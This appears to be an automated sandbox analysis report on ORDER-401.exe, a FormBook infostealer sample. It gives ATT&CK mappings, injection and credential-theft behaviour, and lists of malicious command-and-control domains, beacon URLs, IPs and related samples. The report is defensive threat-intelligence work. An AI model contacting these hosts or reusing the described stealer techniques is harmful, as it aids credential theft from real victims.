                Source: Yara match | File source: 4.2.ORDER-401.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 4.2.ORDER-401.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000008.00000002.3257459238.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2097074904.00000000014B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2096474723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3255288080.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.2099965842.0000000003820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3256732308.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                MITRE ATT&CK Matrix (listed per tactic; the leading numbers are the cell counts as shown in the report, techniques without a number are the unmatched cells of the matrix)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Privilege Escalation: 312 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 312 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 4 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
                Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                Discovery: 121 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 2 File and Directory Discovery; 113 System Information Discovery; Wi-Fi Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                Collection: 1 Email Collection; 1 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                Command and Control: 1 Encrypted Channel; 4 Ingress Tool Transfer; 5 Non-Application Layer Protocol; 5 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                Behavior Graph ID: 1574061; Sample: ORDER-401.exe; Startdate: 12/12/2024; Architecture: WINDOWS; Score: 100

                Behavior graph (rendered from the graph image as text):

                • Start
                  • DNS/IP: www.070001325.xyz; www.397256.pink; 9 other IPs or domains
                    • Signature on www.070001325.xyz: Performs DNS queries to domains with low reputation
                  • Signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 6 other signatures
                  • ORDER-401.exe 3 (started)
                    • Dropped file: C:\Users\user\AppData\...\ORDER-401.exe.log, ASCII
                    • ORDER-401.exe (started)
                      • Signature: Maps a DLL or memory area into another process
                      • PcwrDoOfOMD.exe (injected)
                        • Signature: Found direct / indirect Syscall (likely to bypass EDR)
                        • tzutil.exe 13 (started)
                          • Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                          • PcwrDoOfOMD.exe (injected)
                            • all.wjscdn.com 154.205.159.116, ports 49727, 49728, 49729, IKGUL-26484US, Seychelles
                            • likesharecomment.net 3.33.130.190, ports 49731, 49732, 49733, AMAZONEXPANSIONGB, United States
                            • 4 other IPs or domains
                            • Signature: Found direct / indirect Syscall (likely to bypass EDR)
                          • firefox.exe (started)

                Source | Detection | Scanner | Label | Link
                ORDER-401.exe | 68% | ReversingLabs | Win32.Backdoor.FormBook |
                ORDER-401.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                https://l3filejson4dvd.josyliving.com/favicon.ico | 0% | Avira URL Cloud | safe |
                http://www.likesharecomment.net/nqht/ | 0% | Avira URL Cloud | safe |
                http://www.learnwithus.site/a6qk/ | 0% | Avira URL Cloud | safe |
                http://www.jijievo.site/ao44/ | 0% | Avira URL Cloud | safe |
                http://www.elderscrolls.com/skyrim/characterK | 0% | Avira URL Cloud | safe |
                http://www.likesharecomment.net/nqht/?84EhVDY=367OndwPLlg1rtVHuu/hFbCGvJ/if429pQ84yAc488vbfZMJt5Z+HxLz7hXrMCY/VZoR2j/nhh+f1b5vdUOqFXsQoN/Zd2hU4gow+iq6njGFPvPjknhIkec1akMmhdytlQ==&Y6Bh=0jQHfl_Xbv0D_JU | 0% | Avira URL Cloud | safe |
                http://www.jijievo.site/ao44/?84EhVDY=A8vWRSiUvmcasJ06jd10HzibwJeuLRDoBnzJfQrGbsug5jYLYHm4CMBbVirMn9O9ScG8tIl9AuaKp46Lw3rsJODRcFfkv9imF+x3L/gfGWQmfZ+/LV4xLc4k9ChtjhwSrA==&Y6Bh=0jQHfl_Xbv0D_JU | 0% | Avira URL Cloud | safe |
                http://www.likesharecomment.net | 0% | Avira URL Cloud | safe |
                http://www.taxiquynhonnew.click/y49d/?84EhVDY=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMXj+Nm1qvgbEutIi/VJ05VR66+PohupJRL8TdRX6oU1EEMw==&Y6Bh=0jQHfl_Xbv0D_JU | 100% | Avira URL Cloud | malware |
                http://www.taxiquynhonnew.click/y49d/ | 100% | Avira URL Cloud | malware |
                http://www.070001325.xyz/gebt/?Y6Bh=0jQHfl_Xbv0D_JU&84EhVDY=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edtQopE4JYmWV0aJQG1y+cvjoSBHDa4aEMRetXqM1fOkggqQ== | 0% | Avira URL Cloud | safe |
                https://www.taxiquynhonnew.click/y49d/?84EhVDY=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgU | 100% | Avira URL Cloud | malware |
                https://dq0ib5xlct7tw.cloudfront.net/ | 0% | Avira URL Cloud | safe |
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                www.expancz.top | 107.155.56.30 | true | false | | high
                www.learnwithus.site | 209.74.77.107 | true | false | | high
                all.wjscdn.com | 154.205.159.116 | true | true | | unknown
                dns.ladipage.com | 18.139.62.226 | true | false | | high
                www.397256.pink | 38.46.13.54 | true | true | | unknown
                www.070001325.xyz | 161.97.142.144 | true | false | | high
                likesharecomment.net | 3.33.130.190 | true | true | | unknown
                www.epitomize.shop | unknown | unknown | false | | unknown
                www.taxiquynhonnew.click | unknown | unknown | false | | unknown
                www.jijievo.site | unknown | unknown | false | | unknown
                www.likesharecomment.net | unknown | unknown | false | | unknown
                Name | Malicious | Antivirus Detection | Reputation
                http://www.jijievo.site/ao44/ | true | Avira URL Cloud: safe | unknown
                http://www.likesharecomment.net/nqht/ | true | Avira URL Cloud: safe | unknown
                http://www.likesharecomment.net/nqht/?84EhVDY=367OndwPLlg1rtVHuu/hFbCGvJ/if429pQ84yAc488vbfZMJt5Z+HxLz7hXrMCY/VZoR2j/nhh+f1b5vdUOqFXsQoN/Zd2hU4gow+iq6njGFPvPjknhIkec1akMmhdytlQ==&Y6Bh=0jQHfl_Xbv0D_JU | true | Avira URL Cloud: safe | unknown
                http://www.learnwithus.site/a6qk/ | true | Avira URL Cloud: safe | unknown
                http://www.taxiquynhonnew.click/y49d/?84EhVDY=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMXj+Nm1qvgbEutIi/VJ05VR66+PohupJRL8TdRX6oU1EEMw==&Y6Bh=0jQHfl_Xbv0D_JU | true | Avira URL Cloud: malware | unknown
                http://www.070001325.xyz/gebt/?Y6Bh=0jQHfl_Xbv0D_JU&84EhVDY=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edtQopE4JYmWV0aJQG1y+cvjoSBHDa4aEMRetXqM1fOkggqQ== | true | Avira URL Cloud: safe | unknown
                http://www.taxiquynhonnew.click/y49d/ | true | Avira URL Cloud: malware | unknown
                http://www.jijievo.site/ao44/?84EhVDY=A8vWRSiUvmcasJ06jd10HzibwJeuLRDoBnzJfQrGbsug5jYLYHm4CMBbVirMn9O9ScG8tIl9AuaKp46Lw3rsJODRcFfkv9imF+x3L/gfGWQmfZ+/LV4xLc4k9ChtjhwSrA==&Y6Bh=0jQHfl_Xbv0D_JU | true | Avira URL Cloud: safe | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                https://duckduckgo.com/chrome_newtab | tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://l3filejson4dvd.josyliving.com/favicon.ico | tzutil.exe, 00000008.00000002.3261149338.00000000061D0000.00000004.00000800.00020000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000002.3258543402.0000000002F76000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://duckduckgo.com/ac/?q= | tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://www.google.com/images/branding/product/ico/googleg_lodp.ico | tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://s.yimg.com/wi/ytc.js | tzutil.exe, 00000008.00000002.3259176877.0000000003D06000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.3261149338.00000000061D0000.00000004.00000800.00020000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000002.3258543402.0000000002F76000.00000004.00000001.00040000.00000000.sdmp | false | | high
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://analytics.tiktok.com/i18n/pixel/events.js | tzutil.exe, 00000008.00000002.3259176877.0000000003D06000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.3261149338.00000000061D0000.00000004.00000800.00020000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000002.3258543402.0000000002F76000.00000004.00000001.00040000.00000000.sdmp | false | | high
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmp | false | | high
                http://www.elderscrolls.com/skyrim/characterT | ORDER-401.exe | false | | high
                https://www.ecosia.org/newtab/ | tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmp | false | | high
                http://www.elderscrolls.com/skyrim/characterK | ORDER-401.exe | false | Avira URL Cloud: safe | unknown
                https://ac.ecosia.org/autocomplete?q= | tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmp | false | | high
                http://www.elderscrolls.com/skyrim/player | ORDER-401.exe | false | | high
                https://connect.facebook.net/en_US/fbevents.js | tzutil.exe, 00000008.00000002.3259176877.0000000003D06000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.3261149338.00000000061D0000.00000004.00000800.00020000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000002.3258543402.0000000002F76000.00000004.00000001.00040000.00000000.sdmp | false | | high
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmp | false | | high
                http://www.likesharecomment.net | PcwrDoOfOMD.exe, 00000009.00000002.3260626041.0000000004E8B000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://dq0ib5xlct7tw.cloudfront.net/ | PcwrDoOfOMD.exe, 00000009.00000002.3258543402.0000000002F76000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://www.taxiquynhonnew.click/y49d/?84EhVDY=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgU | tzutil.exe, 00000008.00000002.3259176877.0000000003E98000.00000004.10000000.00040000.00000000.sdmp, PcwrDoOfOMD.exe, 00000009.00000002.3258543402.0000000003108000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | tzutil.exe, 00000008.00000003.2291512456.0000000007CC8000.00000004.00000020.00020000.00000000.sdmp | false | | high
                IP | Domain | Country | ASN | ASN Name | Malicious
                161.97.142.144 | www.070001325.xyz | United States | 51167 | CONTABODE | false
                209.74.77.107 | www.learnwithus.site | United States | 31744 | MULTIBAND-NEWHOPEUS | false
                18.139.62.226 | dns.ladipage.com | United States | 16509 | AMAZON-02US | false
                154.205.159.116 | all.wjscdn.com | Seychelles | 26484 | IKGUL-26484US | true
                107.155.56.30 | www.expancz.top | United States | 135377 | UHGL-AS-APUCloudHKHoldingsGroupLimitedHK | false
                3.33.130.190 | likesharecomment.net | United States | 8987 | AMAZONEXPANSIONGB | true
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1574061
                                                                  Start date and time:2024-12-12 21:35:51 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 9m 58s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Run name:Run with higher sleep bypass
                                                                   Number of new started processes analysed:11
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:2
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:ORDER-401.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@7/2@11/6
                                                                  EGA Information:
                                                                  • Successful, ratio: 75%
                                                                  HCA Information:
                                                                  • Successful, ratio: 95%
                                                                  • Number of executed functions: 169
                                                                  • Number of non-executed functions: 292
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                  • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 23.218.208.109, 52.149.20.212
                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target PcwrDoOfOMD.exe, PID 6036 because it is empty
                                                                   • Not all processes were analyzed, report is missing behavior information
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                  • VT rate limit hit for: ORDER-401.exe
                                                                  No simulations
                                                                   Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                                   161.97.142.144 | SHIPPING DOCUMENTS_PDF.exe | malicious | FormBook | www.070001813.xyz/gn0y/
                                                                   161.97.142.144 | PO2412010.exe | malicious | FormBook | www.070002018.xyz/6m2n/
                                                                   161.97.142.144 | New Purchase Order.exe | malicious | FormBook | www.070001325.xyz/gebt/?INvlf=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==&afo=JnyH0Z2
                                                                   161.97.142.144 | Quotation Validity.exe | malicious | FormBook, PureLog Stealer | www.070002018.xyz/6m2n/
                                                                   161.97.142.144 | Order MEI PO IM202411484.exe | malicious | FormBook | www.030002613.xyz/xd9h/
                                                                   161.97.142.144 | Documents.exe | malicious | FormBook, PureLog Stealer | www.030002449.xyz/cfqm/
                                                                   161.97.142.144 | PAYMENT_TO_NFTC_(CUB)_26-11-24.doc | malicious | DarkTortilla, FormBook | www.070001955.xyz/7zj0/
                                                                   161.97.142.144 | W3MzrFzSF0.exe | malicious | FormBook, PureLog Stealer | www.54248711.xyz/jm2l/
                                                                   161.97.142.144 | IETC-24017.exe | malicious | FormBook, PureLog Stealer | www.030002613.xyz/xd9h/
                                                                   161.97.142.144 | Purchase Order PO.exe | malicious | FormBook | www.070002018.xyz/6m2n/
                                                                   209.74.77.107 | PO2412010.exe | malicious | FormBook | www.beyondfitness.live/fbpt/
                                                                   209.74.77.107 | DHL_734825510.exe | malicious | FormBook | www.happyjam.life/4ii9/
                                                                   209.74.77.107 | SRT68.exe | malicious | FormBook | www.liveplah.live/2bf0/
                                                                   209.74.77.107 | UPDATED CONTRACT.exe | malicious | FormBook | www.gadgetre.info/8q8w/
                                                                   209.74.77.107 | PO 4110007694.exe | malicious | FormBook | www.learnwithus.site/alu5/
                                                                   209.74.77.107 | Latest advice payment.exe | malicious | FormBook | www.learnwithus.site/alu5/
                                                                   209.74.77.107 | SW_5724.exe | malicious | FormBook | www.happyjam.life/4ii9/
                                                                   209.74.77.107 | quotation.exe | malicious | FormBook | www.gadgetre.info/8q8w/
                                                                   209.74.77.107 | Quotation Validity.exe | malicious | FormBook, PureLog Stealer | www.beyondfitness.live/fbpt/
                                                                   209.74.77.107 | specifications.exe | malicious | FormBook, PureLog Stealer | www.gadgetre.info/8q8w/
                                                                   Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                                   www.learnwithus.site | PO 4110007694.exe | malicious | FormBook | 209.74.77.107
                                                                   www.learnwithus.site | Latest advice payment.exe | malicious | FormBook | 209.74.77.107
                                                                   www.learnwithus.site | Docs.exe | malicious | FormBook, PureLog Stealer | 209.74.77.107
                                                                   www.learnwithus.site | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | 209.74.77.107
                                                                   www.learnwithus.site | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | 209.74.77.107
                                                                   www.learnwithus.site | RFQ 3100185 MAHAD.exe | malicious | FormBook | 209.74.77.107
                                                                   all.wjscdn.com | 01152-11-12-24.exe | malicious | FormBook | 154.90.58.209
                                                                   all.wjscdn.com | DRAFT COPY BL, CI & PL.exe | malicious | FormBook | 154.90.58.209
                                                                   all.wjscdn.com | New Order.exe | malicious | FormBook | 154.90.35.240
                                                                   all.wjscdn.com | TNT Express Delivery Consignment AWD 87993766479.vbs | malicious | FormBook | 38.54.112.227
                                                                   all.wjscdn.com | Payment-251124.exe | malicious | FormBook | 154.205.159.116
                                                                   all.wjscdn.com | CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | 38.54.112.227
                                                                   all.wjscdn.com | CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | 154.90.58.209
                                                                   dns.ladipage.com | SHIPPING DOCUMENTS_PDF.exe | malicious | FormBook | 18.139.62.226
                                                                   dns.ladipage.com | CJE003889.exe | malicious | FormBook | 13.228.81.39
                                                                   dns.ladipage.com | MAERSK LINE SHIPPING DOC_4253.exe | malicious | FormBook | 13.228.81.39
                                                                   dns.ladipage.com | QUOTATON-37839993.exe | malicious | FormBook | 13.228.81.39
                                                                   dns.ladipage.com | New Purchase Order.exe | malicious | FormBook | 54.179.173.60
                                                                   dns.ladipage.com | Docs.exe | malicious | FormBook, PureLog Stealer | 18.139.62.226
                                                                   dns.ladipage.com | XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe | malicious | FormBook, PureLog Stealer | 13.228.81.39
                                                                   dns.ladipage.com | Swift copy.exe | malicious | FormBook | 18.139.62.226
                                                                   dns.ladipage.com | wavjjT3sEq.exe | malicious | FormBook | 54.179.173.60
                                                                   dns.ladipage.com | COMMERCIAL-DOKUMEN-YANG-DIREVISI.exe | malicious | FormBook | 18.139.62.226
                                                                   www.expancz.top | MAERSK LINE SHIPPING DOC_4253.exe | malicious | FormBook | 107.155.56.30
                                                                   www.expancz.top | New Purchase Order.exe | malicious | FormBook | 107.155.56.30
                                                                   www.expancz.top | Docs.exe | malicious | FormBook, PureLog Stealer | 107.155.56.30
                                                                   www.expancz.top | XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe | malicious | FormBook, PureLog Stealer | 107.155.56.30
                                                                   www.expancz.top | Swift copy.exe | malicious | FormBook | 107.155.56.30
                                                                   www.070001325.xyz | MAERSK LINE SHIPPING DOC_4253.exe | malicious | FormBook | 161.97.142.144
                                                                   www.070001325.xyz | New Purchase Order.exe | malicious | FormBook | 161.97.142.144
                                                                   www.070001325.xyz | Docs.exe | malicious | FormBook, PureLog Stealer | 161.97.142.144
                                                                   www.070001325.xyz | XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe | malicious | FormBook, PureLog Stealer | 161.97.142.144
                                                                   www.070001325.xyz | Swift copy.exe | malicious | FormBook | 161.97.142.144
                                                                   Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                                   MULTIBAND-NEWHOPEUS | Rockwool-Msg-S9039587897.pdf | malicious | EvilProxy, HTMLPhisher | 209.74.95.101
                                                                   MULTIBAND-NEWHOPEUS | SHIPPING DOCUMENTS_PDF.exe | malicious | FormBook | 209.74.79.42
                                                                   MULTIBAND-NEWHOPEUS | Nieuwebestellingen10122024.exe | malicious | FormBook | 209.74.64.187
                                                                   MULTIBAND-NEWHOPEUS | CJE003889.exe | malicious | FormBook | 209.74.79.40
                                                                   MULTIBAND-NEWHOPEUS | ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | malicious | FormBook | 209.74.79.41
                                                                   MULTIBAND-NEWHOPEUS | PO2412010.exe | malicious | FormBook | 209.74.77.107
                                                                   MULTIBAND-NEWHOPEUS | Recibos.exe | malicious | FormBook | 209.74.77.108
                                                                   MULTIBAND-NEWHOPEUS | SN500, SN150 Spec.exe | malicious | FormBook | 209.74.64.190
                                                                   MULTIBAND-NEWHOPEUS | DHL_734825510.exe | malicious | FormBook | 209.74.77.107
                                                                   MULTIBAND-NEWHOPEUS | SRT68.exe | malicious | FormBook | 209.74.77.107
                                                                   AMAZON-02US | https://es-proposal.webflow.io/ | malicious | HTMLPhisher | 3.164.82.77
                                                                   AMAZON-02US | http://ebaumsworld.com | malicious | Unknown | 34.247.233.198
                                                                   AMAZON-02US | loligang.spc.elf | malicious | Mirai | 13.238.129.232
                                                                   AMAZON-02US | loligang.sh4.elf | malicious | Mirai | 18.255.125.141
                                                                   AMAZON-02US | loligang.ppc.elf | malicious | Mirai | 34.212.126.28
                                                                   AMAZON-02US | loligang.x86.elf | malicious | Mirai | 54.97.121.62
                                                                   AMAZON-02US | loligang.mips.elf | malicious | Mirai | 18.229.68.6
                                                                   AMAZON-02US | loligang.arm7.elf | malicious | Mirai | 18.241.64.66
                                                                   AMAZON-02US | loligang.arm6.elf | malicious | Mirai | 54.171.230.55
                                                                   AMAZON-02US | https://morgans-proposal-site.webflow.io/ | malicious | Captcha Phish, HTMLPhisher | 13.227.9.227
                                                                   CONTABODE | SHIPPING DOCUMENTS_PDF.exe | malicious | FormBook | 161.97.142.144
                                                                   CONTABODE | PO2412010.exe | malicious | FormBook | 161.97.142.144
                                                                   CONTABODE | MAERSK LINE SHIPPING DOC_4253.exe | malicious | FormBook | 161.97.142.144
                                                                   CONTABODE | Need Price Order No.17084 PARLOK.exe | malicious | FormBook | 161.97.168.245
                                                                   CONTABODE | lgkWBwqY15.exe | malicious | FormBook | 161.97.168.245
                                                                   CONTABODE | New quotation request.exe | malicious | FormBook | 161.97.168.245
                                                                   CONTABODE | UPDATED CONTRACT.exe | malicious | FormBook | 161.97.168.245
                                                                   CONTABODE | sora.m68k.elf | malicious | Mirai | 167.86.111.146
                                                                   CONTABODE | PO 4110007694.exe | malicious | FormBook | 161.97.168.245
                                                                   CONTABODE | Latest advice payment.exe | malicious | FormBook | 161.97.168.245
                                                                  No context
                                                                  No context
                                                                  Process:C:\Users\user\Desktop\ORDER-401.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1216
                                                                  Entropy (8bit):5.34331486778365
                                                                  Encrypted:false
                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                  Malicious:true
                                                                  Reputation:high, very likely benign file
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                  Process:C:\Windows\SysWOW64\tzutil.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                  Category:dropped
                                                                  Size (bytes):196608
                                                                  Entropy (8bit):1.1209886597424439
                                                                  Encrypted:false
                                                                  SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                  MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                  SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                  SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                  SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):7.783853579352161
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Windows Screen Saver (13104/52) 0.07%
